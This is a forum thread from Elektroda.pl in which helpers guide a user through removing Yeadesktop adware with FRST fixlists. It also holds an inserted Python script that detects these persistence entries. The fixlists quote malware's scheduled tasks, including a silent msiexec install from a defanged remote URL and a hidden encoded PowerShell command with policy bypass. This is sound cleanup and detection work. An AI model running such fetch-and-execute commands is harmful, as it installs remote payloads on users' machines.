Elektroda.pl

Yeadeskop and pop-up ads

rcthedj 24 May 2017 22:58 552 11
  • #1 24 May 2017 22:58
    rcthedj
    Level 4  

    Hello,

    I need help because I cannot get rid of Yeadeskop and the constantly appearing ads in any way.
    None of my attempts have had any effect.

    Please help.

    0 11
  • Helpful post
    #2 24 May 2017 23:01
    Kasek21
    Level 43  

    Post the required logs!

    0
  • Helpful post
    #4 25 May 2017 06:14
    krzychupar
    Level 40  

    Uninstall:

    hohosearch - Uninstall (HKLM-x32\...\{C191F216-7A56-4009-A23D-3A0E24FFADF4}) (Version: - ) <==== UWAGA

    Open the system Notepad and paste:

    Task: {0952875A-816F-4E4F-BC13-1DE2E07B69C7} - System32\Tasks\Microsoft\Windows\DeviceSettings\Phumatherqukuch => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/oc...JC3T0_WXK1E1522SWNE1522SWN&amp;d=20170524 /q <==== UWAGA
    Task: {17050922-3BBE-4F3B-8C04-8E2FE5B61A0B} - System32\Tasks\{7A7F0C47-7F09-0A7D-0E11-0E0D790B1179} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgADsAIAA7ADsAIAA7ACAAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMA (dane wartości zawierają 10072 znaków więcej). <==== UWAGA
    Task: {1C9D6A54-2896-4508-AAC7-C88E0D28B87D} - System32\Tasks\SmileGour => Rundll32.exe "C:\Program Files\SmileGour\SmileGour.dll",uzUkhiSfmf
    Task: {8A39DC71-5DE2-4212-80E8-07C6C581950D} - System32\Tasks\SystemHealer Run Delay => C:\Program Files (x86)\SystemHealer\SystemHealer.exe <==== UWAGA
    Task: {A02316E4-5F99-45D8-87F1-170747A875B4} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe
    Task: {B7C9E4D3-61E2-49D9-ACC0-C3FC92007414} - System32\Tasks\SystemHealer Monitor => C:\Program Files (x86)\SystemHealer\HealerConsole.exe <==== UWAGA
    Task: {C344828C-E8F4-408A-A6DD-920FEF9C3F81} - System32\Tasks\PCDDataUploadTask => uaclauncher.exe
    Task: {F75757BA-DB71-4412-993B-42CAFF66B847} - System32\Tasks\System Healer Task => C:\PROGRA~2\SYSTEM~1\RESCUE~1.EXE <==== UWAGA
    TWMI_ActiveScriptEventConsumer_ASEC: <===== UWAGA
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\Online Help.lnk -> hxxp://www.virtualdj.com/wiki
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VirtualDJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual DJ\Online Help.lnk -> hxxp://www.virtualdj.com/support
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Virtual DJ\www.virtualdj.com.lnk -> hxxp://www.virtualdj.com
    Shortcut: C:\Users\dell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line\FL Studio 9\Additional\SynthMaker website.lnk -> hxxp://www.synthmaker.co.uk




    ShortcutWithArgument: C:\Users\dell\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files\MMozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\MMozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\MMozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
    Hosts:
    HKLM\...\RunOnce: [OMEWPRODUCT_C5JTJ] => C:\Program Files (x86)\zatcx3fz3bp\144CWMM2UD2O3MS.exe [64000 2017-05-24] (NVZXRL) <===== UWAGA
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [o5tr2w54cci] => C:\Users\dell\AppData\Roaming\pi1zwjl1apo\ggempqahafv.exe [7680 2017-05-24] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [r1fog3rhlyh] => C:\Users\dell\AppData\Roaming\fwlhkzusros\whufiwgdawz.exe [7680 2017-05-24] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [oavk441pb0t] => C:\Users\dell\AppData\Roaming\ffugqhupjp4\1cp3mwjljzk.exe [7680 2017-05-24] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [1KUVCLDH0RV5ZTH] => C:\Program Files (x86)\zatcx3fz3bp\HE8OT.exe [1041408 2017-05-24] (NVZXRL)
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {1bcaf08b-c5ff-11e6-9d88-f8cab8251f54} - "J:\Autorun.exe"
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {1bcaf090-c5ff-11e6-9d88-f8cab8251f54} - "H:\INTRO.EXE"
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {1bcaf096-c5ff-11e6-9d88-f8cab8251f54} - "J:\Autorun.exe"
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\MountPoints2: {7b24b11c-8313-11e6-9cfd-780cb8ad9e12} - "G:\setup.exe"
    ShellExecuteHooks: Brak nazwy - {866BE936-3EB3-11E7-9918-64006A5CFC23} - C:\Users\dell\AppData\Roaming\Kepuph\Herfusetreph.dll -> Brak pliku
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
    CHR HomePage: gudercultshterryanatock -> hxxp://www.initialsite123.com/?z=ff1cd7dd37c6...JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp
    CHR StartupUrls: gudercultshterryanatock -> "hxxp://www.initialsite123.com/?z=ff1cd7dd37c6e25fc7c2860g5z4tfwaq0g1t8wde6b&from=icb&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp"
    CHR DefaultSearchURL: gudercultshterryanatock -> hxxp://www.initialsite123.com/search/?q={searchTerms}&z=ff1cd7dd37c6e25fc7c2860g5z4tfwaq0g1t8wde6b&from=icb&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=sp
    CHR DefaultSearchKeyword: gudercultshterryanatock -> initialsite123
    CHR Profile: C:\Users\dell\AppData\Local\Google\Chrome\User Data\gudercultshterryanatock [2017-05-24] <==== UWAGA
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx <nie znaleziono>
    S2 tw1125916000; C:\ProgramData\tw1125916000.exe [324808 2017-05-24] ()
    2017-05-24 11:52 - 2017-05-24 11:52 - 00016792 _____ C:\WINDOWS\System32\Tasks\SmileGour
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Roaming\pi1zwjl1apo
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Roaming\fwlhkzusros
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Roaming\ffugqhupjp4
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\OVOG4M7G0U
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\MLVDG9E5OE
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\4UIN8VO3R9
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files\3VPJW9550U
    2017-05-24 11:52 - 2017-05-24 11:52 - 00000000 ____D C:\Program Files (x86)\zatcx3fz3bp
    2017-05-24 11:51 - 2017-05-24 11:51 - 00324808 _____ C:\ProgramData\tw1125916000.exe
    2017-05-24 11:51 - 2017-05-24 11:51 - 0324808 _____ () C:\ProgramData\tw1125916000.exe
    2017-05-24 11:51 - 2017-05-24 22:25 - 00003433 _____ C:\ProgramData\log.ewbt
    2017-05-24 11:51 - 2017-05-24 22:25 - 00000128 _____ C:\ProgramData\log.ewbb
    2017-05-24 11:51 - 2017-05-24 22:24 - 00000000 ____D C:\Program Files (x86)\Btickmerjuing Log
    2017-05-24 11:51 - 2017-05-24 13:03 - 00000000 ____D C:\Users\dell\AppData\Roaming\Kepuph
    2017-05-24 11:51 - 2017-05-24 11:52 - 00000000 ____D C:\Users\dell\AppData\Local\Clodent
    2017-05-24 11:51 - 2017-05-24 11:51 - 00324808 _____ C:\ProgramData\tw1125916000.exe
    2017-05-24 11:51 - 2017-05-24 11:51 - 00006134 _____ C:\WINDOWS\System32\Tasks\Btickmerjuing Log
    2017-05-24 11:51 - 2017-05-24 11:51 - 00000000 ____D C:\Program Files (x86)\Ataricklermerch
    2017-05-24 09:59 - 2017-05-24 10:09 - 00000000 ____D C:\Users\dell\Desktop\House (3)
    2017-05-16 14:42 - 2016-07-16 13:36 - 00000000 ____D C:\WINDOWS\CbsTemp
    C:\Program Files (x86)\zatcx3fz3bp\144CWMM2UD2O3MS.exe
    C:\ProgramData\tw1125916000.exe
    EmptyTemp:

    Save the file as fixlist.txt and place it next to FRST in the same folder.
    Run FRST and click Fix/Napraw.

    0
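A triage sketch for the kinds of entries the fixlist above removes, added here as an example and not part of the original post or of FRST: it flags scheduled tasks that run msiexec against a remote URL or PowerShell with -EncodedCommand, browser shortcuts with a URL argument, and Run keys pointing into a user's AppData, and it decodes the encoded command (base64 of UTF-16LE) for review. The sample lines, rule names and function names are constructed for illustration.

```python
import base64
import re

# Constructed sample lines in FRST log format, modelled on the entry types in
# the fixlist above; hosts, GUIDs and paths are placeholders, not from the thread.
SAMPLE = r"""
Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\Example1 => msiexec.exe /i hxxp://cdn.example.invalid/pkg.msi /q
Task: {00000000-0000-0000-0000-000000000002} - System32\Tasks\Example2 => powershell.exe -nologo -executionpolicy bypass -windowstyle hidden -EncodedCommand JABhAD0AMQA=
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://start.example.invalid/
HKU\S-1-5-21-0-0-0-1001\...\Run: [abc123] => C:\Users\user\AppData\Roaming\qwertyuiop\asdfgh.exe [7680 2017-05-24] ()
Task: {00000000-0000-0000-0000-000000000003} - System32\Tasks\Backup => C:\Windows\System32\wbadmin.exe
""".strip().splitlines()

# Rule names are hypothetical labels; each pattern targets one persistence trick.
RULES = [
    ("task-remote-msi", re.compile(r"^Task:.*msiexec(\.exe)?\s+/i\s+h(tt|xx)ps?://", re.I)),
    ("task-encoded-powershell", re.compile(r"^Task:.*powershell.*\s-enc\w*\s", re.I)),
    ("shortcut-url-argument", re.compile(r"^ShortcutWithArgument:.*->\s*h(tt|xx)ps?://", re.I)),
    ("run-key-in-user-appdata", re.compile(r"\\Run(Once)?: \[.*?\] => .*\\AppData\\(Roaming|Local)\\", re.I)),
]

def decode_encoded_command(line):
    """Return the decoded PowerShell text after -EncodedCommand, or None if absent."""
    m = re.search(r"-enc\w*\s+([A-Za-z0-9+/=]+)", line, re.I)
    if not m:
        return None
    blob = m.group(1)
    # Logs may truncate long values: keep only whole 4-character base64 groups.
    blob = blob[: len(blob) - len(blob) % 4]
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")

def triage(lines):
    """Return [(rule_name, line, decoded_command_or_None)] for each flagged line."""
    hits = []
    for line in lines:
        for name, rx in RULES:
            if rx.search(line):
                hits.append((name, line, decode_encoded_command(line)))
                break
    return hits

if __name__ == "__main__":
    for name, line, decoded in triage(SAMPLE):
        print(f"[{name}] {line[:90]}")
        if decoded:
            print(f"    decoded: {decoded!r}")
```
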
  • Helpful post
    #5 25 May 2017 08:00
    Kolobos
    Computer specialist

    After running it, post new FRST logs from a scan.

    0
  • Helpful post
    #7 25 May 2017 10:28
    Kolobos
    Computer specialist

    Back up your bookmarks from Chrome; the browser profile will be deleted.
    Also delete the browser sync data from your Google account (if you sync).

    Uninstall:
    hohosearch - Uninstall <- you can also remove this entry with regedit from the uninstall key.
    initialsite123 - Uninstall

    Run this Fixlist.txt for FRST:
    CloseProcesses:
    Task: {15137A9A-7A10-468F-90CB-16C0112EE02B} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-25] () <==== UWAGA
    Task: {287BF10D-3333-4C81-B941-64805D43B249} - \Btickmerjuing Log -> Brak pliku <==== UWAGA
    Task: {A79AF8BF-7070-4552-BDE8-3D5C548710A1} - System32\Tasks\Vatiry Manager => C:\Program Files (x86)\Coicersyghermutain\yaupdcache.exe [2017-05-25] ()
    (DBQZLC9) C:\Program Files\KW581BQBLS\GVIRHTEOK.exe
    (DBQZLC9) C:\Program Files\E094CZK2E7\R9I5FMJMY.exe
    (DBQZLC9) C:\Program Files\R83FHZPZ56\R83FHZPZ5.exe
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [0l4dkwz5zmp] => C:\Users\dell\AppData\Roaming\zuhoahlyug1\cyfsuou5are.exe [7680 2017-05-25] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [YO242YORYT0DKA4] => C:\Program Files\KW581BQBLS\GVIRHTEOK.exe [1202688 2017-05-25] (DBQZLC9)
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [wcqkqytnugm] => C:\Users\dell\AppData\Roaming\nc4ltztspyo\wu0sli3rl5j.exe [7680 2017-05-25] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [mxqwqwk2l5u] => C:\Users\dell\AppData\Roaming\zigeon35jdj\fiktaxrveyo.exe [7680 2017-05-25] ()
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [W11XEMQQYZSWW7Q] => C:\Program Files\E094CZK2E7\R9I5FMJMY.exe [1202688 2017-05-25] (DBQZLC9)
    HKU\S-1-5-21-603311595-3298310252-627542946-1001\...\Run: [KL0RT67432APNA5] => C:\Program Files\R83FHZPZ56\R83FHZPZ5.exe [1202688 2017-05-25] (DBQZLC9)
    HKLM\...\Providers\x067rr9p: C:\Program Files (x86)\Btickmerjuing Log\local64spl.dll
    ShellExecuteHooks: Brak nazwy - {63882DA6-3EB7-11E7-B5E3-64006A5CFC23} - C:\Users\dell\AppData\Roaming\Ropaarediing\Kodetainatilck.dll [145920 2017-05-25] ()
    FF ProfilePath: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\mkujzk9h.default-1495622189506\Profiles\mkujzk9h.default-1495622189506 [nie znaleziono]
    FF SearchPlugin: C:\Users\dell\AppData\Roaming\Mozilla\Firefox\Profiles\mkujzk9h.default-1495622189506\searchplugins\2rv50r20.xml [2017-05-25]
    CHR DefaultProfile: pigerghtatenecultaretodom
    CHR HomePage: pigerghtatenecultaretodom -> hxxp://www.initialsite123.com/?z=ffe4e5f4fd79...JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp
    CHR StartupUrls: pigerghtatenecultaretodom -> "hxxp://www.initialsite123.com/?z=ffe4e5f4fd7902f0a5c17c7gbz1tfw5qbtebao5q3o&from=isr2&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=hp"
    CHR DefaultSearchURL: pigerghtatenecultaretodom -> hxxp://www.initialsite123.com/search/?q={searchTerms}&z=ffe4e5f4fd7902f0a5c17c7gbz1tfw5qbtebao5q3o&from=isr2&uid=WDCXWD10JPVX-75JC3T0_WXK1E1522SWNE1522SWN&type=sp
    CHR DefaultSearchKeyword: pigerghtatenecultaretodom -> initialsite123
    CHR Profile: C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom [2017-05-25] <==== UWAGA
    C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom
    CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-09]
    CHR Extension: (Chrome Media Router) - C:\Users\dell\AppData\Local\Google\Chrome\User Data\pigerghtatenecultaretodom\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-01-11]
    R2 BIT; C:\ProgramData\BIT\BIT.dll [1811968 2017-05-25] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
    R2 snare; C:\Users\dell\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA
    R2 WinSAPSvc; C:\Users\dell\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-25] (TODO: <公司名>) [Brak podpisu cyfrowego] <==== UWAGA
    R1 cryptfd; C:\WINDOWS\System32\drivers\cryptfd.sys [193448 2017-04-18] ()
    2017-05-25 09:46 - 2017-05-25 09:46 - 00003678 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-05-25 09:46 - 2017-05-25 09:46 - 00000000 ____D C:\ProgramData\BIT
    2017-05-25 09:46 - 2017-05-25 09:46 - 00000000 ____D C:\Program Files (x86)\MIO
    2017-05-25 09:45 - 2017-05-25 09:45 - 00000000 ____D C:\Users\dell\AppData\Roaming\WinSAPSvc
    2017-05-25 09:45 - 2017-05-25 09:45 - 00000000 ____D C:\Users\dell\AppData\Local\snare
    2017-05-25 09:45 - 2017-05-25 09:45 - 00000000 ____D C:\Cosusp
    2017-05-25 09:44 - 2017-05-25 09:45 - 00000000 ____D C:\Program Files (x86)\Coicersyghermutain
    2017-05-25 09:44 - 2017-05-25 09:44 - 00006082 _____ C:\WINDOWS\System32\Tasks\Vatiry Manager
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Roaming\Ropaarediing
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Roaming\Microleaves
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Local\Mihatgrerwidom
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Users\dell\AppData\Local\AdvinstAnalytics
    2017-05-25 09:44 - 2017-05-25 09:44 - 00000000 ____D C:\Program Files (x86)\Vatiry Manager
    2017-05-25 09:43 - 2017-05-25 09:44 - 00000000 ____D C:\Program Files\R83FHZPZ56
    2017-05-25 09:43 - 2017-05-25 09:44 - 00000000 ____D C:\Program Files\E094CZK2E7
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Users\dell\AppData\Roaming\zuhoahlyug1
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Users\dell\AppData\Roaming\zigeon35jdj
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Users\dell\AppData\Roaming\nc4ltztspyo
    2017-05-25 09:43 - 2017-05-25 09:43 - 00000000 ____D C:\Program Files\KW581BQBLS
    2017-05-24 22:25 - 2017-05-24 22:26 - 00000132 _____ C:\ProgramData\log.binb

    0
  • Helpful post
    #9 25 May 2017 11:21
    Kolobos
    Computer specialist

    In regedit, search for the identifiers:
    C191F216-7A56-4009-A23D-3A0E24FFADF4
    and:
    BDEF7AA7-3E2F-46D7-B1C6-42309ADD6621

    Delete the C:\FRST folder and that's all.

    0
  • #10 25 May 2017 11:27
    rcthedj
    Level 4  

    In the uninstall key in the registry there are no files under these identifiers, and the Find option in the registry does not find these identifiers either.

    1
  • #11 25 May 2017 11:29
    Kolobos
    Computer specialist

    Since they show up in the logs, they are in the registry; you are doing something wrong.

    Search for just: 3A0E24FFADF4 and 42309ADD6621, using the Find option of course, not manually!

    0
  • #12 25 May 2017 11:42
    rcthedj
    Level 4  

    Removed, it has disappeared from Add/Remove Programs :)

    The C:\FRST folder is deleted.

    Thank you very much for the help :) Everything is back in proper order :) You really are a computer specialist :)

    Regards and all the best :) Take care :)

    0